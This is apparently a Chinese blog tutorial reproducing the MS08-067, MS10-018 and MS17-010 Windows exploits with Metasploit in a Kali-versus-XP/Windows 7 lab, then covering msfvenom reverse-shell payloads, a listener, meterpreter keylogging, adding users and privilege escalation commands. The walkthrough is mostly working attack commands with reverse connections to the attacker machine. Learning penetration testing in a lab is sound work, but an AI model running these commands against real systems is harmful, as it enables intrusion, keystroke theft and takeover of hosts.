MSF之漏洞复现

7 篇文章 0 订阅
5 篇文章 0 订阅

MS08-067漏洞复现

漏洞简介:

MicrosoftWindows是美国微软(Microsoft)公司发布的一系列操作系统。Windows的Server服务在处理特制RPC请求时存在缓冲区溢出漏洞。远程攻击者可以通过发送恶意的RPC请求触发这个溢出,导致完全入侵用户系统,以SYSTEM权限执行任意指令。对于Windows2000、XP和Server2003,无需认证便可以利用这个漏洞;对于WindowsVista和Server2008,可能需要进行认证。

漏洞环境:

kali + windows xp

kali:192.168.247.129

windows xp:192.168.247.131

漏洞利用:

1.输入msfconsole进入msf终端

2.查找ms08-067漏洞利用模块

search ms08-067

3.使用查找出来的攻击模块

use exploit/windows/smb/ms08_067_netapi

4.设置攻击payload(reverse_tcp:反向连接)

set payload windows/meterpreter/reverse_tcp

5.设置攻击地址

set rhosts 192.168.247.131

6.查看targets

show targets

7.选择攻击目标(根据靶机选择)

set target 7

8.查看配置

show options

9.执行exploit攻击exploit/run

10.进入windows shellshell

查看用户net user

添加用户net usr test 123 /add

11.使用键盘记录,先查看进程经行进程迁移

使用ps找到合适的进程进行迁移,迁移到有管理员权限的进程migrate 668

使用keyscan_start开启键盘记录

在XP系统中任意输入字符,使用keyscan_dump进行查看(keyscan_stop关闭键盘记录;如果记录不成功则切换进程重新进行迁移)

MS10-018漏洞攻防还原

漏洞简介

ms10-018漏洞,它是IE浏览器漏洞,可以通过该漏洞获取目标主机的控制权。最严重的漏洞可能在用户使用IE浏览器查看特制网页时允许执行远程代码。详细信息

漏洞环境

  • kali + windows xp //本次实验设置网络为仅主机模式
    kali:192.168.159.128windows xp:192.168.159.129

漏洞利用

  1. 开启msf控制台msfconsole,查询可利用模块

search ms10_018

use exploit/windows/browser/ms10_018_ie_behaviors


2.通过命令options查看需要配置的参数一一经行配置


set lport 5555 //设置目标端口

set srvport 8888 //设置监听端口

set lhost 192.168.159.128 //设置kali的ip

set srvhost 192.168.159.128 //设置kali的ip

set uripath /test //设置uri路径


3.经行攻击

exploit


4.去xp系统访问对应的URL,http://192.168.159.128:8080/test访问之后会闪退


5.msf会接收到session


6.查看攻击后产生的sessions


7.使用sessions -i 3进入会话

三、MSF之MS17-010漏洞攻防还原

永恒之蓝介绍:

永恒之蓝漏洞(MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的漏洞 “EternalBlue”(永恒之蓝)进行改造而成 。勒索病毒的肆虐,俨然是一场全球性互联网灾难,给广大电脑用户造成了巨大损失。据统计,全球100多个国家和地区超过10万台电脑遭到了勒索病毒攻击、感染。

漏洞原理:

永恒之蓝漏洞通过 TCP 的445和139端口,来利用 SMBv1 和 NBT 中的远程代码执行漏洞,通过恶意代码扫描并攻击开放445文件共享端口的 Windows 主机。只要用户主机开机联网,即可通过该漏洞控制用户的主机。不法分子就能在其电脑或服务器中植入勒索病毒、窃取用户隐私、远程控制木马等恶意程序。

影响版本:

目前已知受影响的 Windows 版本包括但不限于:WindowsNT,Windows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。(针对windows 7及以前的版本)

漏洞环境

kali + windows 7

kali: 192.168.247.129

windows 7: 192.168.247.130

漏洞利用

msfconsole //进入msf

search ms17-010 //查找ms17-010漏洞可利用模块

use
exploit/windows/smb/ms17_010_psexec //使用攻击模块

set rhosts 192.168.247.130 //设置目标ip,这里是win7

exploit

查看用户所在目录,shell进入windows的cmd

发现是乱码可以使用chcp 65001这个解决,当然msf还有一些后渗透提供的功能例如

//捕获屏幕

meterpreter > screenshot

//上传文件

meterpreter > upload hello.txt path

//下载文件

meterpreter > download file

//远程桌面

meterpreter > run vnc

MSF之后续权限渗透

MSF Windows提权

反弹shell

使用msf生成payload

在Kali中输入命令进入msf

msfconsole

生成payload

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.179.128

lport=12345 -f exe >/var/www/html/s.exe

# lhost 是kali的ip

# lport 是kali监听端口

将刚才生成的 s.exe 文件上传到服务器(靶机)C:\RECYCLER\s.exe 目录(因为一般C:\RECYCLER\ 目录都有读写权限)

kali 开启本地监听

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.179.128

set lport 12345

exploit

使用命令可以查看配置情况

show options

使用webshell执行上传的s.exe文件,发现缺少对象,在windows提权篇说过,这种情况需要上传一个版本匹配的cmd.exe文件到c:\recycler目录

执行接收到反弹shell(截图端口有误应为12345)

发现只是一个iis用户,需要进行提权操作

提权

Windows 提权 exp 存储文件夹路径

/usr/share/metasploit-framework# cd modules/exploits/windows/local/

常见的提权模块如下:

ms14_058 内核模式驱动程序中的漏洞库能允许远程代码执行

ms16_016 WebDAV 本地提权漏洞(CVE-2016-0051)

ms16_032 MS16-032 Secondary Logon Handle 本地提权漏洞

常用提权命令

sysinfo 查看系统命令

migrate 注入进程

getuid 获取当前用户

getprivs 尽可能提升权限

getsystem 通过各种攻击向量来提升系统用户权限

可以先使用 getsystem 来自动提权,如果失败再手动提权

基础命令

ps 列出进程

sessions 查看会话

background 把session放置后台

sessions -i number # 与会话进行交互,number表示第n个session,使用session -i 连接到指定序号的meterpreter会话已继续利用

interact id #切换进一个信道

back 返回主界面

shell 得到终端

search搜索模块

show 列模块

info 查看模块信息

  • 1
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值